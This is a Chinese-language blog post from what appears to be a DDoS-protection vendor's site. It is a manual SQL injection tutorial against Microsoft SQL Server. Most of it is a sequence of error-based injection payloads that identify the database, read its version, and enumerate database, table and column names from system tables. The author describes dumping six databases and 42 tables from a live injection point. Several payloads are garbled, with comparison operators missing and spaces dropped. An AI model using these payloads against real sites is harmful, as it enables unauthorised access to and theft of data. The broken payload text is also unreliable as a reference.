DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

MSSQL手工注入

09-18 WEB安全

注入点屏蔽了and语句and 1=2 没有报错,就用or语句。

MSSQL手工注入


MSSQL手工注入


and (select count(*) from sysobjects)>0 返回正常就是mssql数据库

MSSQL手工注入


and 1=(select @@version) 查看版本信息

MSSQL手工注入


and 1=(select db_name())获取当前所在数据库名(对其他数据库没有权限)

MSSQL手工注入


and 1=(select top 1 name from master..sysdatabases where dbid>4)
获取第一个数据库名

MSSQL手工注入


and 1=(select top 1 name from master..sysdatabases where dbid>4 andname  '第一个数据库库名') 获取第二个数据库库名

MSSQL手工注入


可以继续爆数据库:and 1=(select top 1 name from master..sysdatabaseswhere dbid>4 and name  '第一个库名' and name  '第二个库名')

MSSQL手工注入


以此类推我爆出了6个数据库
 and 1=(select top 1 name from master..sysdatabases where dbid>4 andname  '第一个库名' and name  '第二个库名' and name  '第三个库名' and name  '第四个库名' and name  '第五个库名' and name  '第六个库名')

MSSQL手工注入


获取第一个当前使用的数据库表名:and 1=(select top 1 name from sysobjects wherextype='u')

MSSQL手工注入


获取第二个当前使用的数据库表名:and 1=(select top 1 name from sysobjects where xtype='u’ and name  '第一个数据库表名')

MSSQL手工注入


以此类推一直把所有表名全部爆出(超痛苦~)
 and 1=(select top 1 name from sysobjects wherextype='u' and name  '表1' and name  '表2' and name  '表3' and name  '表4' and name  '表5' and name  '.......................... and name  '表42')

MSSQL手工注入


获取第一个当前使用的数据库中的表(CusTomer)中的字段:and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'CusTomer'))

MSSQL手工注入

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://sskjddosgb11.ddosgb.com//web/133.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 698415访问次数
  • 建站天数
  • 友情链接

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X